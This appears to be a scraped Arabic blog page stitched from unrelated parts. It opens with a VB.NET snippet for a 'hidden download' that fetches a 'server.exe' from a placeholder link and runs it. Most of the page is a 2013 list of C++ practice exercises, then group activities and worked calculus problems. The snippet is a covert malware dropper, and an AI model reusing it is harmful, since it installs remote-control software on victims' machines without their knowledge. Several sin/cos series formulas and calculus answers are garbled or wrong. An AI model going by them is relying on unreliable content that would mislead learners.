            MessageBox.Show("Error")
            End
-------------------------------------

لعمل داونلود مخفي للسيرفر وتشغيلة
كود:
Dim web As New System.Net.WebClient
web.DownloadFile("الرابط المباشر لسرفرك", Environ("tmp") & "/server.exe")
S h e l l(Environ("tmp") & "/server.exe")


12/04/2013

50 سؤال تطبيقي في لغة C++ - د. صالح العسلي



  
1.         اكتب برنامجاٌ  يولد 140 من الأعداد العشوائية ثم يقوم بطباعة تلك الأعداد  ( كل 7 في سطر)، ثم يطبع في سطر جديد قيمة أكبر عدد. 

2.         اكتب برنامجاٌ  يولد 160 من الأعداد العشوائية ثم يقوم بطباعة تلك الأعداد  (كل 8 في سطر)، ثم يطبع في سطر جديد قيمة أصغر عدد. 

3.         باستخدام الدوال: اكتب برنامجاٌ  يولد 100 من الأعداد العشوائية ثم يخزنها في مصفوفة احادية، ثم يستقبل عدداٌ صحيحاٌx  ، ثم يستدعي دالة للبحث عن العنصر x في المصفوفة  ثم يطبع الرسالة المناسبة.
4.         اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ ثم يطبعه، ثم يستدعي دالة لطباعة مضروب ذالك العدد في سطر جديد.
5.         باستخدام الدوال: اكتب برنامجاٌ  يقرأ عددين صحيحين ويطبعهما، ثم يستدعي دالة لحساب وطباعة القاسم المشترك الأكبر للعددين.
6.         اكتب برنامجاٌ  يقرأ ثلاثة أعداد صحيحة، ثم استخدم الدالة السابقة لحساب القاسم المشترك الأكبر للأعداد الثلاثة الصحيحة.
7.         اكتب برنامجاٌ  يقرأ عددين صحيحين ويطبعهما، ثم يستدعي دالة لحساب و طباعة المضاعف المشترك الأصغر للعددين.

8.         اكتب برنامجاٌ  لحساب مساحة مثلث بمعلومية 1- اضلاعه الثلاثة.2- ضلعين والزاوية بينهما.

9.         اكتب برنامجاٌ  يستقبل عددا كسري بالكيلومتر ، ثم يستدعي دالة لحساب و طباعة قيمة العدد بالميل. 1mile = 1.609344 km
10.    اكتب برنامجاٌ  يستقبل عددا كسري بالميل ، ثم يستدعي دالة لحساب و طباعة قيمة العدد بالكيلومتر. 1mile = 1.609344 km
11.    اكتب برنامجاٌ  يستقبل عددا كسري يمثل درجة الحرارة in Fahrenheit ، ثم يستدعي دالة لحساب و طباعة قيمة العدد  in Celsius . C = 5(F-32)/9
12.    اكتب برنامجاٌ  يستقبل عددا كسري يمثل درجة الحرارة in Celsius ، ثم يستدعي دالة لحساب و طباعة قيمة العدد  in Fahrenheit . F= (9C/5)+3213.    كل عدد يمكن ان يكتب على هيئة حاصل ضرب عوامل أولية، اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ، ثم يستدعي دالة لطباعة العدد و طول العدد، ودالة أخرى لطباعة العوامل الأولية المكونة للعدد.
14.    إذا كان العدد 57386  فإن مقلوب العدد هو68375 ، اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ،  ثم يقوم بطباعة العدد وطباعة مجموع العدد مع مقلوبه في سطر اخر.

15.    اكتب برنامجاٌ  يستقبل عددين صحيحين x ,y  ثم يقوم هذا البرنامج بطباعة  كل الأعداد  المحصورة بين هذين العددين والتي تقبل القسمة على كل من 3 و 9 بدون باقي.
16.    اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ بالنظام العشريx  ، ثم يقوم البرنامج بطباعة قيمة العدد x بالنظام الثنائي.

17.    اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ بالنظام العشريx  ، ثم يقوم البرنامج بطباعة قيمة العدد x بالنظام السداسي عشر.
18.    بدون استخدام   if، اكتب برنامجاٌ  يكون 3  أعداداٌ  عشوائية بحيث تكون مرتبة تنازليا ثم يقوم البرنامج بطباعة تلك الأعداد.
19.    اكتب برنامجاٌ  لتحديد اكبر زاوية في مثلث بمعلومية اضلاعه الثلاثة.
20.    اكتب برنامجاٌ  يولد 3  أعداداٌ  عشوائية ثم يقوم البرنامج بطباعة تلك الأعداد في سطر و طباعة قيمة متوسط الخانة التي تقع في اقصى اليمين لكل الأعداد  في سطر اخر.
21.    اكتب برنامجاٌ  يولد 100 من الأعداد  العشوائية ثم يخزنها في مصفوفة احادية، ثم يطبع قيمة وموقع ثاني أصغر عنصر في المصفوفة.
22.    اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ، ثم يستدعي دالة لفحص العدد وطباعة هل هو أولي ام لا.
23.    اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ، ثم يستدعي دالة لحساب وطباعة أقرب عدد أولي لذالك العدد.
24.    اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ، ثم يقوم هذا البرنامج بحساب وطباعة الجذر التربيعي للعدد.
25.    اكتب برنامجاٌ  يولد 50000 عدداٌ صحيحاٌ عشوائياً، قيمهن محصورة بين 0 , 31، ثم يستدعي دالة تطبع كل عدد مع تكراره.

26.    اكتب برنامجاٌ يعرف مصفوفة أحادية مكونة من 200 موقعا من نوع int ثم يولد فيها أعداداٌ  عشوائية، ثم يستدعي دالة تطبع  عناصر القائمة مفروزة بناءٌ على قيمة أول خانة في أقصى اليمين ( كل سبعة عناصر في سطر).

27.    اكتب برنامجاٌ  يستقبل عددا كسري بالنظام العشريx  ، ثم يقوم هذا البرنامج بطباعة قيمة العدد x بالنظام الثنائي.
28.    اكتب برنامجاٌ  لحساب Sin(x) such that Sin (x) = x -x/2 +x/3! -x/4! + x/5! - ….. +x/(n+1)!
29.    اكتب برنامجاٌ  لحساب Cos(x) such that Cos (x) = 1 -x/2 +x/3! -x/4! + x/5! - ….. +x/(n+1)!
30.    بدون استخدام   if ، اكتب برنامجاٌ   يكون المصفوفة التالية  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A
  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B
  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C
  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D
  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E
  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F
  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G
  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H
  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I
  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J
  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K
  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L
  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M
  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N
  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O
  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P
  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q
  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R
  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S
  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T
  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U
  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V
  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W
  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X
  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y
 


 ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
1.      اكتب برنامجاٌ  يقرأ ثلاثة أعداد صحيحة تمثل الوقت ويطبعه، ثم يزيد عليه ثانية واحدة ثم يطبع الوقت بعد الزيادة.

2.      اكتب برنامجاٌ  يقرأ ثلاثة أعداد صحيحة تمثل الوقت ويطبعه، ثم ينقص منه ثانية واحدة ثم يطبع الوقت بعد ذالك.

3.      اكتب برنامجاٌ  يولد 140 من الأعداد العشوائية ثم يطبع تلك الأعداد  ( كل 7 في سطر)، ثم يطبع في سطر جديد قيمة أكبر عدد. 

4.      اكتب برنامجاٌ  يولد 160 من الأعداد العشوائية ثم يطبع تلك الأعداد  (كل 8 في سطر)، ثم يطبع في سطر جديد قيمة أصغر عدد.

5.      اكتب برنامجاٌ  يولد 40 عددا عشوائيا ويطبع في اقل عدد من الأسطر الأعداد الفردية  في عمود، والأعداد الزوجية في عمود آخر.

6.      اكتب برنامجاٌ  يولد 160عددا عشوائيا ويطبع تلك الأعداد (كل 8 في سطر)، ويطبع في سطر آخرعدد الأعداد الفردية وعدد الأعداد الزوجية. 

7.      اكتب برنامجاٌ  يولد 40 من الأعداد العشوائية ثم يطبع تلك الأعداد (كل 8 في سطر)، ثم يطبع في سطر جديد مجموع الأعداد الفردية  و مجموع الأعداد الزوجية، كلا على حدة.

8.      اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ ثم يطبعه، ثم يستدعي دالة لطباعة مضروب ذالك العدد في سطر جديد.

9.      اكتب برنامجاٌ  يستقبل عدداٌ كسرياٌ يمثل قطر دائرة، ثم يستدعي دالة لحساب وطباعة مساحة ومحيط الدائرة .

10. اكتب برنامجاٌ  يستقبل عددين كسريين، الاول يمثل قطر دائرة، والثاني يمثل ارتفاع أسطوانة,  ثم يستدعي دالة لحساب وطباعة المساحة الجانبية والمساحة الكلية للأسطوانة.

11. اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ يمثل السنة الميلادية ويطبعه، ثم يستدعي دالة للطباعة في سطر آخر هل السنة كبيسة أم غير ذالك.

12. باستخدام الدوال: اكتب برنامجاٌ  يقرأ ثلاثة أعداد كسرية ويطبعهم، ثم يستدعي دالة لطباعة أكبر الأعداد الثلاثة في سطر جديد.

13. اكتب برنامجاٌ  يولد عددا عشوائيا يمثل احد الاحرف الكبيرة الإنجليزية ويطبعه، ثم يطبع بقية كل الاحرف الكبيرة الإنجليزية التي لم تظهر. 

14. باستخدام الدوال: اكتب برنامجاٌ  يقرأ ثلاثة أعداد كسرية ويطبعهم، ثم يستدعي دالة لطباعة الأعداد الثلاثة في سطر آخر مرتبه تصاعديا.
15. باستخدام الدوال: اكتب برنامجاٌ  يقرأ ثلاثة أعداد كسرية ويطبعهم، ثم يستدعي دالة لحساب وطباعة مساحة المثلث الناتج عن الأعداد الثلاثة، ثم يستدعي دالة أخرى لحساب وطباعة حجم متوازي الاضلاع الناتج عن الأعداد الثلاثة ثم يستدعي دالة أخرى لحساب وطباعة حجم الأسطوانة الناتج عن العددين الأول والثاني.

16. اكتب برنامجاٌ  يولد 3  أعداداٌ  عشوائية ثم يقوم البرنامج بطباعة تلك الأعداد في سطر، ويطبع في سطر اخر قيمة متوسط الخانة التي تقع في اقصى اليمين لكل الأعداد.

17. باستخدام الدوال: اكتب برنامجاٌ  يقرأ عددين صحيحين ويطبعهما، ثم يستدعي دالة لحساب وطباعة القاسم المشترك الأكبر للعددين.
18. اكتب برنامجاٌ  يقرأ ثلاثة أعداد صحيحة، ثم استخدم الدالة السابقة لحساب القاسم المشترك الأكبر للأعداد الثلاثة الصحيحة.
19. اكتب برنامجاٌ  يقرأ عددين صحيحين ويطبعهما، ثم يستدعي دالة لحساب و طباعة المضاعف المشترك الأصغر للعددين.

20. اكتب برنامجاٌ  لحساب مساحة مثلث بمعلومية 1- اضلاعه الثلاثة.2- ضلعين والزاوية بينهما.

21. اكتب برنامجاٌ  يستقبل عدداٌ كسريا بالكيلومتر، ثم يستدعي دالة لحساب وطباعة قيمة العدد بالميل. 1mile = 1.609344 km
22. اكتب برنامجاٌ  يستقبل عددا كسري بالميل، ثم يستدعي دالة لحساب وطباعة قيمة العدد بالكيلومتر. 1mile = 1.609344 km
23. اكتب برنامجاٌ  يستقبل عدداٌ كسرياٌ يمثل درجة الحرارة in Fahrenheit، ثم يستدعي دالة لحساب وطباعة قيمة العدد  in Celsius . C = 5(F-32)/9
24. اكتب برنامجاٌ  يستقبل عدداٌ كسرياٌ يمثل درجة الحرارة in Celsius ، ثم يستدعي دالة لحساب وطباعة قيمة العدد  in Fahrenheit . F= (9C/5)+3225. كل عدد صحيح يمكن أن يكتب على هيئة حاصل ضرب عوامل أولية، اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ ويطبعه، ثم يستدعي دالة لطباعة طول العدد في سطر آخر، ويستدعي دالة أخرى لطباعة العوامل الأولية المكونة للعدد في سطر آخر.
26. إذا كان العدد 5738  فإن مقلوبه8375 ، اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ ويطبعه، ثم يطبع مجموع العدد مع مقلوبه في سطر اخر.

27. اكتب برنامجاٌ يستقبل عددين صحيحين، ثم يقوم  بطباعة الأعداد المحصورة بين العددين والتي تقبل القسمة على 3 و 9 بدون باقي.
28. اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ بالنظام العشري ويطبعه، ثم يقوم البرنامج بطباعة قيمة العدد بالنظام الثنائي.

29. اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ بالنظام العشري ويطبعه، ثم يقوم البرنامج بطباعة قيمة العدد بالنظام السداسي عشر.
30. بدون استخدام   if، اكتب برنامجاٌ  يكون 3  أعداداٌ  عشوائية بحيث تكون مرتبة تنازليا ثم يقوم البرنامج بطباعة تلك الأعداد.
31. اكتب برنامجاٌ  لتحديد اكبر زاوية في مثلث بمعلومية اضلاعه الثلاثة.

32. اكتب برنامجاٌ  يعرف مصفوفة أحادية مكونة من 20 موقعا من نوع int ثم يضع في الموقع الأول 50، ويضع في الموقع الثاني 55، وهكذا، ثم يطبع محتوى المصفوفة  (كل 8 في سطر).

33.  اكتب برنامجاٌ  يعرف مصفوفة أحادية مكونة من 50 موقعا من نوع int ثم يضع في الموقع الأول 50، ويضع في الموقع الثاني 55، وهكذا، ثم يطبع محتوى المصفوفة  (كل 8 في سطر)، ثم يطبع سطرا جديدا، ثم يطبع محتوى المصفوفة من النهاية  (كل 7 في سطر).

34. اكتب برنامجاٌ  يولد 100 من الأعداد  العشوائية ثم يخزنها في مصفوفة احادية، ثم يقوم بطباعة تلك الأعداد  (كل 8 في سطر)، ثم يطبع في سطر آخر قيمة وموقع أصغر عنصر، وقيمة وموقع أكبر عنصر في المصفوفة.
35. اكتب برنامجاٌ  يولد 40 من الأعداد العشوائية ثم يخزنها في مصفوفة أحادية، ثم يطبع تلك الأعداد (كل 8 في سطر)، ثم يطبع في سطر آخر مجموع الأعداد في المواقع الفردية  و مجموع الأعداد في المواقع الزوجية، كلا على حدة.

36. باستخدام الدوال: اكتب برنامجاٌ  يولد 100 من الأعداد العشوائية ثم يخزنها في مصفوفة احادية، ثم يقوم بطباعة تلك الأعداد  (كل 8 في سطر)، ثم يستقبل عدداٌ صحيحاٌx  ويطبعه، ثم يستدعي دالة للبحث عن العنصر x في المصفوفة ويطبع الرسالة المناسبة في سطر آخر.

37. باستخدام الدوال: اكتب برنامجاٌ  يولد 100 من الأعداد العشوائية ويخزنها في مصفوفة احادية، ويطبع تلك الأعداد  (كل 8 في سطر)، ثم يستقبل عدداٌ صحيحاٌx  ويطبعه، ثم يستدعي دالة للبحث عن العنصر x في المصفوفة ويطبعه مع عدد تكراره في سطر آخر إن وجد.
38. اكتب برنامجاٌ  يولد 100 من الأعداد العشوائية ثم يخزنها في مصفوفة أحادية، ويطبع تلك الأعداد (كل 8 في سطر)، ثم يستدعي دالة تطبع في سطر آخر قيمة وموقع ثاني أصغر عنصر في المصفوفة.
39. باستخدام الدوال: اكتب برنامجاٌ  يولد 150من الأعداد العشوائية ثم يخزنها في مصفوفة احادية، ويطبع تلك الأعداد (كل 4 مع مجموعهن في سطر)، (المجموعة الاخيرة يتم استبدال اصفار مكان العناصر الغير موجودة).

40. باستخدام الدوال: اكتب برنامجاٌ  يولد 150من الأعداد العشوائية ثم يخزنها في مصفوفة احادية، ويطبع تلك الأعداد(كل 7 في سطر) ثم يستدعي دالة تطبع كل الأعداد التي تتساوى فيها اقصى خانة في اليمين مع اقصى خانة في اليسار في سطر آخر.

41. اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ ويطبعه، ثم يستدعي دالة لفحص العدد وطباعة هل هو أولي ام لا.
42. اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ ويطبعه، ثم يستدعي دالة لحساب وطباعة أقرب عدد أولي لذالك العدد.
43. بدون استخدام الدالة  sqrt( ) ،اكتب برنامجاٌ  يستقبل عدداٌ صحيحاٌ ويطبعه، ثم يقوم البرنامج بحساب وطباعة الجذر التربيعي للعدد.
44. اكتب برنامجاٌ  يولد 50000 عدداٌ صحيحاٌ عشوائياً، قيمهن محصورة بين 0 , 31، ثم يستدعي دالة تطبع كل عدد مع تكراره.

45. اكتب برنامجاٌ يعرف مصفوفة أحادية مكونة من 200 موقعا من نوع int ثم يولد فيها أعداداٌ عشوائية، ثم يستدعي دالة تطبع عناصر القائمة مفروزةٌ بناءٌ على قيمة أول خانة في أقصى اليمين ( كل سبعة عناصر في سطر).

46. اكتب برنامجاٌ يعرف مصفوفة أحادية مكونة من 200 موقعا من نوع int ثم يولد فيها أعداداٌ عشوائية،(تحاكي درجات الطلاب) قيمة كل عدد لا تزيد عن 99 ، ثم  يطبع تلك الدرجات (كل 7 في سطر) ثم يستدعي دالة تطبع عدد الطلاب الناجحين و عدد الطلاب الراسبين.

47. اكتب برنامجاٌ يعرف مصفوفة أحادية مكونة من 200 موقعا من نوع int ثم يولد فيها أعداداٌ عشوائية،(تحاكي درجات الطلاب) قيمة كل عدد لا تزيد عن 99، ثم  يطبع تلك الدرجات (كل 7 في سطر) ثم يستدعي دالة تطبع عدد الطلاب الحاصلين على ممتاز، وعدد الطلاب الحاصلين على جيد جدا، وعدد الطلاب الحاصلين على جيد، وعدد الطلاب الحاصلين على مقبول، وعدد الطلاب الراسبين.

48. اكتب برنامجاٌ يعرف مصفوفة أحادية مكونة من 200 موقعا من نوع int ثم يولد فيها أعداداٌ عشوائية،(تحاكي درجات الطلاب) قيمة كل عدد لا تزيد عن 99، ثم يستدعي دالة واحدة تطبع درجات الطلاب الحاصلين على ممتاز وعددهم، وتطبع درجات الطلاب الحاصلين على جيد جدا وعددهم، وتطبع درجات الطلاب الحاصلين على جيد وعددهم، وتطبع درجات الطلاب الحاصلين على مقبول وعددهم، وتطبع درجات الطلاب الراسبين وعددهم.

49. اكتب برنامجاٌ يعرف مصفوفة أحادية مكونة من 200 موقعا من نوع int ثم يولد فيها أعداداٌ عشوائية،(تحاكي درجات الطلاب) قيمة كل عدد لا تزيد عن 99، ثم يستدعي دالة واحدة تطبع متوسط درجات الطلاب الحاصلين على ممتاز وعددهم، وتطبع متوسط درجات الطلاب الحاصلين على جيد جدا وعددهم، وتطبع متوسط درجات الطلاب الحاصلين على جيد وعددهم، وتطبع متوسط درجات الطلاب الحاصلين على مقبول وعددهم، وتطبع متوسط درجات الطلاب الراسبين وعددهم.

50. اكتب برنامجاٌ  يستقبل عدداٌ كسرياٌ بالنظام العشريx  ويطبعه، ثم يقوم هذا البرنامج بطباعة قيمة العدد x بالنظام الثنائي.
51. اكتب برنامجاٌ  لحساب Sin(x) such that Sin (x) = x -x/2 +x/3! -x/4! + x/5! - ….. +x/(n+1)!
52. اكتب برنامجاٌ  لحساب Cos(x) such that Cos (x) = 1 -x/2 +x/3! -x/4! + x/5! - ….. +x/(n+1)!
   53. بدون استخدام   if ، اكتب برنامجاٌ   يكون المصفوفة التالية  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A
  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B
  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C
  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D
  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E
  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F
  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G
  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H
  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I
  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J
  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K
  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L
  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M
  O  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N
  P  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O
  Q  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P
  R  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q
  S  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R
  T  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S
  U  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T
  V  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U
  W  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V
  X  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W
  Y  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X
  Z  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y
    
انشطة جماعية
 

1)  اذكر الخطوات اللازمة لحساب مساحة احدى الزوايا الخارجة عن الدائرة علما بان طولضلع المربع يساوى قطر الدائرة، يساوى L.2)  اذكر الخطوات اللازمة لإصدار فاتورة الكهرباء لمنزل ما، اعتبر توفر كل المعلومات لذالك.
3)  اذكر الخطوات اللازمة لإصدار مرتب شهري لموظف ما، اعتبر توفر كل المعلومات لذالك.4)  اذكر الخطوات اللازمة لغسل مجموعة من الملابس المختلفة لشخص ما بواسطة غسالة عند وجود كل المتطلبات لذالك.
5)  اذكر الخطوات اللازمة لإصدار نتيجة طالب ما في الفصل الاول من السنة الاولى في الجامعة، اعتبر توفر كل المعلومات لذالك.
6)  اذكر الخطوات اللازمة لإصدار نتيجة طالب ما في الفصل الثاني من السنة الاولى في الجامعة، اعتبر توفر كل المعلومات لذالك.
7)  اذكر الخطوات اللازمة وذالك لأخذ 4 cm3 كعينة دم من وريد شخص ما لغرض فحصه، عند وجود كل المتطلبات لذالك.

8)  اذكر الخطوات اللازمة وذالك لحقن 5 cm3 من الدواء في وريد شخص ما لغرض علاجه، عند وجود كل المتطلبات لذالك.

9)  اذكر الخطوات اللازمة لقياس ما تفرزه الكليتين من البول لشخص ما خلال 24 ساعة ( يوجد إناء مدرج للقياس) .

10) اذكر الخطوات اللازمة وذالك لفحص مجموعة X من المسافرين موجودين في طابور لمدخل الطائرة A.11) اذكر الخطوات اللازمة لقياس سرعة طائرة في الجو ( يوجد جهاز لقياس المسافة بين نقطة ما و الطائرة).12) اذكر الخطوات اللازمة لحساب عدد الارقام التي فيها الخانة التي في اقصى اليمين تساوي الخانة التي في اقصى اليسار، وذالك لمجموعة  Xمن الارقام موجودة في المصفوفة A.13) يوجد ميزان حساسا ذو كفتين، و توجد10  من الكرات المتماثلة بالحجم واللون، توجد1  من تلك الكرات وزنها مختلف عن بقية الكرات الأخرى، استخدم الميزان 3 مرات فقط، وذالك لتحديد الكرة المختلفة وبين هل الكرة خفيفة ام ثقيلة الوزن. اذكر الخطوات اللازمة لذالك.
14)     صفيحة معدنية مستوية رقيقة على شكل مثلث متساوي الاضلاع، تتمدد بانتظام محتفظة بشكلها، فإذا كان طول ضلع المثلث يزداد بمعدل 1/√3 ، اكتب برنامجاٌ  يحسب معدل الزيادة في مساحة الصفيحة عندما يصبح طول ضلع المثلث مساويا 10 cm
الحلنفرض ان طول ضلع المثلث يساوى x cm
  بما ان مساحة المثلثA  تساوى نصف حاصل ضرب ضلعين في جيب الزاوية المحصورة بينهما *x*x* sin θ= ½  ஃ A=1/2* x2 sin θ =1/2*x2* (√3/2)
ثم نشتق الطرفين بالنسبة للزمن t
ஃ  dA/dt  = 2√3/2*xdx/dt
but x= 10     ஃ   dx/dt  =1/ √3 cm per second.
ஃ   dA/dt  =√3/2*10* 1/√3= 5 cm.15)     سلم طوله  20 ft يستند بطرفه الأعلى  على حائط ، و بطرفه الاسفل على الارض ، فإذا كان الطرف الاسفل للسلم ينزلق على الارض مبتعدا عن الحائط  بمعدل 4 ft/ sec في اللحظة التي يكون الطرف الاسفل على بعد 12 ft من الحائط، فكم يكون  معدل انزلاق  الطرف الأعلى للسلم على الحائط في تلك اللحظة ؟
الحلنفرض ان  x هي بعد قاعدة السلم عن الحائط
و نفرض ان  y هي بعد راس  السلم عن الحائطو نفرض ان dy/dt هي معدل حركة راس  السلم
المطلوب هو ايجاد معدل حركة راس  السلم عندما تكون قيمة x   تساوى 12.
dx/dt  =4ft/sec  when  x= 12 ftx2 + y2 =400so 2x dx/dt + 2y dy/dt =0at x=12 ft   so y= 16 ft.so dy/dt= 12/16*4=-3 ft/sec1/ √3 cm per second